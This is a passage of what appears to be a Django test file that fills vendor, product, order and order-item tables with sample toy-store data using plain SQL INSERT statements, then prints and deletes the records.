cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('BRE02','Bear Emporium','500 Park Street','Anytown','OH','44333', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('DLL01','Doll House Inc.','555 High Street','Dollsville','CA','99999', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('FRB01','Furball Inc.','1000 5th Avenue','New York','NY','11111', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('FNG01','Fun and Games','42 Galaxy Road','London', NULL,'N16 6PS', 'England');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('JTS01','Jouets et ours','1 Rue Amusement','Paris', NULL,'45678', 'France');")
# Populate Products table
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR01', 'BRS01', '8 inch teddy bear', 5.99, '8 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR02', 'BRS01', '12 inch teddy bear', 8.99, '12 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR03', 'BRS01', '18 inch teddy bear', 11.99, '18 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG01', 'DLL01', 'Fish bean bag toy', 3.49, 'Fish bean bag toy, complete with bean bag worms with which to feed it');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG02', 'DLL01', 'Bird bean bag toy', 3.49, 'Bird bean bag toy, eggs are not included');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG03', 'DLL01', 'Rabbit bean bag toy', 3.49, 'Rabbit bean bag toy, comes with bean bag carrots');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RGAN01', 'DLL01', 'Raggedy Ann', 4.99, '18 inch Raggedy Ann doll');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RYL01', 'FNG01', 'King doll', 9.49, '12 inch king doll with royal garments and crown');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RYL02', 'FNG01', 'Queen doll', 9.49, '12 inch queen doll with royal garments and crown');")
# Populate Orders table
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20005, '2020-05-01', '1000000001');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20006, '2020-01-12', '1000000003');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20007, '2020-01-30', '1000000004');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20008, '2020-02-03', '1000000005');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20009, '2020-02-08', '1000000001');")
# Populate OrderItems table
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20005, 1, 'BR01', 100, 5.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20005, 2, 'BR03', 100, 10.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 1, 'BR01', 20, 5.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 2, 'BR02', 10, 8.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 3, 'BR03', 10, 11.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 1, 'BR03', 50, 11.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 2, 'BNBG01', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 3, 'BNBG02', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 4, 'BNBG03', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 5, 'RGAN01', 50, 4.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 1, 'RGAN01', 5, 4.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 2, 'BR03', 5, 11.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 3, 'BNBG01', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 4, 'BNBG02', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 5, 'BNBG03', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 1, 'BNBG01', 250, 2.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 2, 'BNBG02', 250, 2.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 3, 'BNBG03', 250, 2.49);")
def tearDown(self):
# Clean up run after every test method.
Customers.objects.all().delete()
Vendors.objects.all().delete()
Orders.objects.all().delete()
OrderItems.objects.all().delete()
Products.objects.all().delete()
def test_customers(self):
for i in Customers.objects.all():
print(i.to_dict())
for i in Vendors.objects.all():
print(i.to_dict())
for i in Orders.objects.all():
print(i.to_dict())
for i in OrderItems.objects.all():
print(i.to_dict())
for i in Products.objects.all():
print(i.to_dict()) | 2.4375 | 2 |